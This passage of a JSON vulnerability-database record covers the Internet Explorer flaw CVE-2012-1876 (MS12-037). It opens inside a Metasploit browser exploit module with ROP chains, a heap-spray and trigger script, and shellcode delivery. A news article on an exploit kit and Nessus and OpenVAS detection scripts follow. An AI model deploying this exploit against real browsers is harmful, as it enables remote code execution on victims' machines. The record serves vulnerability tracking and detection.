retn\n 0x77c46101, # rop nop (-> edi)\n 0x77c4d680, # pop edx; retn\n 0x00000040, # newProtect (0x40) (-> edx)\n 0x77c4e392, # pop eax; retn\n nop, # nops (-> eax)\n 0x77c12df9 # pushad; retn\n ].pack(\"V*\")\n when :jre\n print_status(\"Using JRE ROP\")\n exec_size = code.length\n rop =\n [\n 0x7c346c0b, # retn\n 0x7c36f970, # pop ebp; retn\n 
0x7c348b05, # xchg eax,esp; retn (pivot)\n 0x7c36f970, # pop ebp; retn [MSVCR71.dll]\n 0x7c36f970, # skip 4 bytes [MSVCR71.dll]\n 0x7c34373a, # pop ebx ; retn [MSVCR71.dll]\n exec_size, # ebx\n 0x7c3444d0, # pop edx ; retn [MSVCR71.dll]\n 0x00000040, # 0x00000040-> edx\n 0x7c361829, # pop ecx ; retn [MSVCR71.dll]\n 0x7c38f036, # &Writable location [MSVCR71.dll]\n 0x7c342766, # pop edi ; retn [MSVCR71.dll]\n 0x7c346c0b, # retn (rop nop) [MSVCR71.dll]\n 0x7c350564, # pop esi ; retn [MSVCR71.dll]\n 0x7c3415a2, # jmp [eax] [MSVCR71.dll]\n 0x7c3766ff, # pop eax ; retn [MSVCR71.dll]\n 0x7c37a151, # ptr to &VirtualProtect() - 0x0ef [IAT msvcr71.dll]\n 0x7c378c81, # pushad # add al,0ef ; retn [MSVCR71.dll]\n 0x7c345c30 # ptr to 'push esp; ret ' [MSVCR71.dll]\n ].pack(\"V*\")\n end\n\n code = rop + code\n return code\n end\n\n def on_request_uri(cli, request)\n\n agent = request.headers['User-Agent']\n my_target = get_target(agent)\n\n # Avoid the attack if the victim doesn't have the same setup we're targeting\n if my_target.nil?\n print_error(\"Browser not supported: #{agent}\")\n send_not_found(cli)\n return\n end\n\n js_code = Rex::Text.to_unescape(get_payload(my_target), Rex::Arch.endian(target.arch))\n\n table_builder = ''\n\n 0.upto(132) do |i|\n table_builder << \"<table style=\\\"table-layout:fixed\\\" ><col id=\\\"#{i}\\\" width=\\\"41\\\" span=\\\"9\\\" >  </col></table>\"\n end\n\n # About smash_vtable():\n # * smash the vftable 0x07070024\n # * span => the amount to overwrite\n js_element_id = Rex::Text.rand_text_alpha(4)\n spray_trigger_js = <<-JS\n\n var dap = \"EEEE\";\n while ( dap.length < 480 ) dap += dap;\n\n var padding = \"AAAA\";\n while ( padding.length < 480 ) padding += padding;\n\n var filler = \"BBBB\";\n while ( filler.length < 480 ) filler += filler;\n\n var arr = new Array();\n var rra = new Array();\n\n var div_container = document.getElementById(\"#{js_element_id}\");\n div_container.style.cssText = \"display:none\";\n\n for (var i=0; i < 
500; i+=2) {\n rra[i] = dap.substring(0, (0x100-6)/2);\n arr[i] = padding.substring(0, (0x100-6)/2);\n arr[i+1] = filler.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n }\n\n for (var i=200; i<500; i+=2 ) {\n rra[i] = null;\n CollectGarbage();\n }\n\n function heap_spray(){\n CollectGarbage();\n\n var shellcode = unescape(\"#{js_code}\");\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n var onemeg = shellcode.substr(0, 64*1024/2);\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n var spray = new Array();\n\n for (i=0; i<400; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n }\n\n function smash_vtable(){\n var obj_col_0 = document.getElementById(\"132\");\n obj_col_0.width = \"1178993\";\n obj_col_0.span = \"44\";\n }\n\n setTimeout(function(){heap_spray()}, 400);\n setTimeout(function(){smash_vtable()}, 700);\n JS\n\n if datastore['OBFUSCATE']\n spray_trigger_js = ::Rex::Exploitation::JSObfu.new(spray_trigger_js)\n spray_trigger_js.obfuscate(memory_sensitive: true)\n end\n\n # build html\n content = <<-HTML\n <html>\n <body>\n <div id=\"#{js_element_id}\"></div>\n #{table_builder}\n <script language='javascript'>\n #{spray_trigger_js}\n </script>\n </body>\n </html>\n HTML\n\n print_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ms12_037_ie_colspan.rb"}], "threatpost": [{"lastseen": "2018-10-06T23:00:49", "bulletinFamily": "info", "cvelist": ["CVE-2012-0755", "CVE-2012-1876", "CVE-2012-5067", "CVE-2013-0634"], "description": "You cannot accuse the keepers of the Cool Exploit Kit of not recognizing market 
trends. Given a rash of recent watering hole attacks and zero-day exploits built around Microsoft\u2019s Internet Explorer browser, it\u2019s no surprise that a 15-month-old IE exploit has been included in the crimeware package.\n\nMicrosoft [reported](<http://blogs.technet.com/b/mmpc/archive/2013/05/07/cve-2012-1876-recent-update-to-the-cool-exploit-kit-landing-page.aspx>) last night the inclusion of [CVE-2012-1876](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1876>) in Cool, a vulnerability in IE that was patched last June in [MS12-037](<http://technet.microsoft.com/en-us/security/bulletin/ms12-037>).\n\nThis is a remote code execution heap-based buffer overflow flaw that impacts IE 6-9. Researchers from VUPEN demonstrated a successful exploit during the 2012 Pwn2Own contest that was able to bypass ASLR and DEP data execution protections built into Window. VUPEN\u2019s exploit beat a fully patched version of IE 9 running on a Windows 7 machine.\n\n\u201cThis can be achieved by leaking an address of the mshtml.dll module, building a heap spray based on this address and triggering the vulnerability again to execute the payload,\u201d VUPEN said in a [blogpost](<http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php>) last July, adding that its researchers combined this exploit with another zero-day in order to bypass IE\u2019s Protected mode.\n\n\u201cAfter triggering the vulnerability for a memory leak to disclose interesting addresses, it is possible to trigger the same vulnerability once again to achieve code execution by overflowing the same buffer in memory with arbitrary values,\u201d VUPEN said.\n\nMicrosoft\u2019s Justin Kim said Cool is the only kit to carry the IE exploit.\n\n\u201cFor a while it seemed exploit kit writers were not too interested in this vulnerability,\u201d Kim said.\n\nThe IE exploit is not the only new addition to Cool. 
Microsoft said Adobe Reader and Flash exploits have also been added ([CVE-2012-0755](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0755>) and [CVE-2013-0634](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0634>), respectively). The IE attack, however, opens the spectrum of potential victims because of a return-oriented programming technique that allows it to identify the DLL a process is running on, and match a malicious payload to the corresponding DLL.\n\n\u201cThe exploit includes not only one but 18 different attack payloads, giving attackers the ability to leverage 18 different versions _ofmshtml.dll_. In the past, there was only one payload per exploit targeting one specific version of the module, usually XP system files or several other 3rd-party files that are without address space layout randomization (ASLR) protection enabled,\u201d Kim said. \u201cWith this enhancement in exploit stability, the exploit is capable of exploiting a larger population of victims, including those using Windows Vista and Windows 7.\u201d\n\nThe Cool Exploit Kit was first detected in October in a spate of attacks involving the Reveton ransomware. The [discovery of Cool](<http://malware.dontneedcoffee.com/2012/10/newcoolek.html>) happened after [French researcher Kafeine](<http://malware.dontneedcoffee.com/2012/11/cool-ek-hello-my-friend-cve-2012-5067.html>) discovered an exploit for a Windows vulnerability first exploited by Duqu. The same exploit ended up in the Blackhole Exploit Kit, leading experts to conclude the [same group was running both](<http://threatpost.com/cool-blackhole-exploit-kits-created-same-hacker-010913/>).\n\nAs for the Adobe-related additions to Cool, the most severe seems to be CVE-2013-0634 for Flash, which was [patched by Adobe in February](<http://threatpost.com/emergency-adobe-flash-player-patched-fix-pair-zero-days-020813/>). The exploit injects websites with malicious .SWF files targeting Firefox and Safari users. 
This is the same LadyBoyle attack used against targets in the aerospace industry signed with [digital certificates stolen from Asian gaming companies](<http://threatpost.com/stolen-winnti-certificates-used-watering-hole-attack-against-tibet-orphans-site-041213/>) as outline in the [Winnti research](<http://www.securelist.com/en/blog/208194218/Winnti_Stolen_Digital_Certificates_Used_in_Orphan_Tibetan_Refugee_Children_Caregivers_Attack>) done by Kaspersky Lab. Tibetan activists were also targets of these attacks as well.\n", "modified": "2013-05-08T15:00:45", "published": "2013-05-08T11:00:45", "id": "THREATPOST:0EF2611E64611F9EBB9DD054ABF7473B", "href": "https://threatpost.com/old-ie-attack-finds-its-way-into-cool-exploit-kit/100330/", "type": "threatpost", "title": "Cool Exploit Kit Includes Old Internet Explorer Exploit", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-03-01T06:18:31", "description": "The remote host is missing Internet Explorer (IE) Security Update\n2699988.\n\nThe installed version of IE is affected by several vulnerabilities\nthat could allow an attacker to execute arbitrary code on the remote\nhost.", "edition": 28, "published": "2012-06-13T00:00:00", "title": "MS12-037: Cumulative Security Update for Internet Explorer (2699988)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1876", "CVE-2012-1875", "CVE-2012-1880", "CVE-2012-1872", "CVE-2012-1881", "CVE-2012-1858", "CVE-2012-1878", "CVE-2012-1523", "CVE-2012-1882", "CVE-2012-1879", "CVE-2012-1874", "CVE-2012-1873", "CVE-2012-1877"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "id": "SMB_NT_MS12-037.NASL", "href": "https://www.tenable.com/plugins/nessus/59455", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(59455);\n script_version(\"1.31\");\n script_cvs_date(\"Date: 
2018/11/15 20:50:31\");\n\n script_cve_id(\n \"CVE-2012-1523\",\n \"CVE-2012-1858\",\n \"CVE-2012-1872\",\n \"CVE-2012-1873\",\n \"CVE-2012-1874\",\n \"CVE-2012-1875\",\n \"CVE-2012-1876\",\n \"CVE-2012-1877\",\n \"CVE-2012-1878\",\n \"CVE-2012-1879\",\n \"CVE-2012-1880\",\n \"CVE-2012-1881\",\n \"CVE-2012-1882\"\n );\n script_bugtraq_id(\n 53841,\n 53842,\n 53843,\n 53844,\n 53845,\n 53847,\n 53848,\n 53866,\n 53867,\n 53868,\n 53869,\n 53870,\n 53871\n );\n script_xref(name:\"EDB-ID\", value:\"19777\");\n script_xref(name:\"EDB-ID\", value:\"20174\");\n script_xref(name:\"EDB-ID\", value:\"24017\");\n script_xref(name:\"EDB-ID\", value:\"33944\");\n script_xref(name:\"EDB-ID\", value:\"35815\");\n script_xref(name:\"MSFT\", value:\"MS12-037\");\n script_xref(name:\"MSKB\", value:\"2699988\");\n\n script_name(english:\"MS12-037: Cumulative Security Update for Internet Explorer (2699988)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by code execution vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2699988.\n\nThe installed version of IE is affected by several vulnerabilities\nthat could allow an attacker to execute arbitrary code on the remote\nhost.\");\n # http://blog.watchfire.com/wfblog/2012/07/tostatichtml-the-second-encounter-cve-2012-1858-html-sanitizing-information-disclosure-introduction-t.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7d49512\");\n # http://www.vupen.com/blog/20120710.Advanced_Exploitation_of_Internet_Explorer_HeapOv_CVE-2012-1876.php\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?18c6adba\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-093/\");\n script_set_attribute(attribute:\"see_also\", 
value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-190/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-192/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-193/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-12-194/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523185/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523186/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/523196/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2012/ms12-037\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\nand 2008 R2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS12-037 Microsoft Internet Explorer Fixed Table Col Span Heap Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/12\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS12-037';\nkb = '2699988';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = hotfix_path2share(path:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 / 2008 R2\n #\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.1\", file:\"Mshtml.dll\", version:\"9.0.8112.20551\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n 
hotfix_is_vulnerable(os:\"6.1\", file:\"Mshtml.dll\", version:\"9.0.8112.16446\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.21976\", min_version:\"8.0.7601.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.17824\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.21198\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.17006\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.20551\", min_version:\"9.0.8112.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"9.0.8112.16446\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23359\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19272\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22838\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18616\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) 
||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23345\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19258\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21312\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17110\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.4986\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23345\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.19258\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21312\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17110\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6212\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n 
hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-20T08:50:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1876", "CVE-2012-1875", "CVE-2012-1880", "CVE-2012-1872", "CVE-2012-1881", "CVE-2012-1858", "CVE-2012-1878", "CVE-2012-1523", "CVE-2012-1882", "CVE-2012-1879", "CVE-2012-1874", "CVE-2012-1873", "CVE-2012-1877"], "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-037.", "modified": "2017-07-05T00:00:00", "published": "2012-06-13T00:00:00", "id": "OPENVAS:902682", "href": "http://plugins.openvas.org/nasl.php?oid=902682", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (2699988)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms12-037.nasl 6526 2017-07-05 05:43:52Z cfischer $\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (2699988)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow remote attackers to gain sensitive\n information or execute arbitrary code in the context of the application.\n Impact Level: System/Application\";\ntag_affected = \"Microsoft Internet Explorer version 6.x/7.x/8.x/9.x\";\ntag_insight = \"Multiple vulnerabilities are due to the way that Internet Explorer,\n - Handles content using specific strings when sanitizing HTML.\n - Handles EUC-JP character encoding.\n - Processes NULL bytes, which allows to disclose content from the process\n memory.\n - Accesses an object that has been deleted, which allows to corrupt memory\n using Internet Explorer Developer Toolbar.\n - Accesses an object that does not exist, when handling the 'Col' element.\n - Accesses an object that has been deleted, when handling Same ID Property,\n 'Title' element, 'OnBeforeDeactivate' event, 'insertRow' method and\n 'OnRowsInserted' event allows to corrupt memory.\n - Accesses an undefined memory location, when handling the\n 'insertAdjacentText' method allows to corrupt memory.\n - Handles 'Scrolling' event.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms12-037\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS12-037.\";\n\nif(description)\n{\n script_id(902682);\n script_version(\"$Revision: 6526 $\");\n script_cve_id(\"CVE-2012-1523\", \"CVE-2012-1858\", \"CVE-2012-1872\", \"CVE-2012-1873\",\n \"CVE-2012-1874\", \"CVE-2012-1875\", 
\"CVE-2012-1876\", \"CVE-2012-1877\",\n \"CVE-2012-1878\", \"CVE-2012-1879\", \"CVE-2012-1880\", \"CVE-2012-1881\",\n \"CVE-2012-1882\");\n script_bugtraq_id(53841, 53842, 53843, 53844, 53845, 53847, 53848, 53866,\n 53867, 53868, 53869, 53870, 53871);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-05 07:43:52 +0200 (Wed, 05 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-06-13 09:16:32 +0530 (Wed, 13 Jun 2012)\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (2699988)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_mandatory_keys(\"MS/IE/Version\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/49412/\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2699988\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id/1027147\");\n script_xref(name : \"URL\" , value : \"http://www.securelist.com/en/advisories/49412\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms12-037\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variables Initialization\nsysPath = \"\";\nieVer = \"\";\ndllVer = 
NULL;\n\n## Check for OS and Service Pack\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:2) <= 0){\n exit(0);\n}\n\n## Get IE Version from KB\nieVer = get_kb_item(\"MS/IE/Version\");\nif(!ieVer || !(ieVer =~ \"^(6|7|8|9)\")){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\n## Get Version from Mshtml.dll\ndllVer = fetch_file_version(sysPath, file_name:\"system32\\Mshtml.dll\");\nif(!dllVer){\n exit(0);\n}\n\n## Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"6.0.2900.0000\", test_version2:\"6.0.2900.6211\")||\n version_in_range(version:dllVer, test_version:\"7.0.0000.00000\", test_version2:\"7.0.6000.17109\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.20000\", test_version2:\"7.0.6000.21311\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19257\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23344\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"6.0.3790.0000\", test_version2:\"6.0.3790.4985\") ||\n version_in_range(version:dllVer, test_version:\"7.0.0000.00000\", test_version2:\"7.0.6000.17109\")||\n version_in_range(version:dllVer, test_version:\"7.0.6000.21000\", test_version2:\"7.0.6000.21311\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19257\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23344\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows Vista and Windows Server 2008\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"7.0.6002.18000\", 
test_version2:\"7.0.6002.18615\")||\n version_in_range(version:dllVer, test_version:\"7.0.6002.22000\", test_version2:\"7.0.6002.22837\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.18000\", test_version2:\"8.0.6001.19271\")||\n version_in_range(version:dllVer, test_version:\"8.0.6001.20000\", test_version2:\"8.0.6001.23358\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16445\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20550\")){\n security_message(0);\n }\n exit(0);\n}\n\n## Windows 7\nelse if(hotfix_check_sp(win7:2) > 0)\n{\n ## Check for Mshtml.dll version\n if(version_in_range(version:dllVer, test_version:\"8.0.7600.16000\", test_version2:\"8.0.7600.17005\")||\n version_in_range(version:dllVer, test_version:\"8.0.7600.20000\", test_version2:\"8.0.7600.21197\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.16000\", test_version2:\"8.0.7601.17823\")||\n version_in_range(version:dllVer, test_version:\"8.0.7601.21000\", test_version2:\"8.0.7601.21975\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.16000\", test_version2:\"9.0.8112.16445\")||\n version_in_range(version:dllVer, test_version:\"9.0.8112.20000\", test_version2:\"9.0.8112.20550\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-06-10T19:59:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2012-1876", "CVE-2012-1875", "CVE-2012-1880", "CVE-2012-1872", "CVE-2012-1881", "CVE-2012-1858", "CVE-2012-1878", "CVE-2012-1523", "CVE-2012-1882", "CVE-2012-1879", "CVE-2012-1874", "CVE-2012-1873", 